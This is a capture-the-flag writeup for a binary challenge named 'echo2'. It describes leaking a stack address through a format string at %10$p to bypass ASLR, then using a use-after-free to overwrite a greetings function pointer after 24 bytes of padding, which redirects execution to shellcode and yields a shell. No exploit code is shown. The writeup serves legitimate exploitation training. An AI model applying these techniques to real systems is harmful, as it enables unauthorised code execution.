Writeup: echo2

At first we realize that there is a format string vulnerability by which we can leak the memory addresses of the stack and thus bypassing ASLR.

After a few attempts we see that in position %10$p we leak memory address of the stack and at minus 0x20 it would be the pointer of name whose test content we entered was "AAAA".

The next step is to create our exploit that makes the leak using pwntools lib

Once the format string has been exploited, we see in option 4 with free() function we free the content of the name variable from the heap. Free function receives the pointer of the variable "o" whose content is the memory address of the heap and then the content of name.

We check in memory:

After run it we send "n" option for not exit. By executing this function it will release the contents of the first chunk and thus be able to be used again, Use After Free. The main reason to release will be to write with the option 3 the first chunk and overwrite after a padding of 24 bytes the memory address of greetings by the leak stack memory address whose content will be the shellcode or name. The vulnerability is that the greeting function is called and we have a write primitive after releasing with free and using again the first chunk of the heap writting 24 bytes of padding plus the memory address that we want getting hijacking execution flow.

We finish developing the exploit staying as follows and getting a shell! :)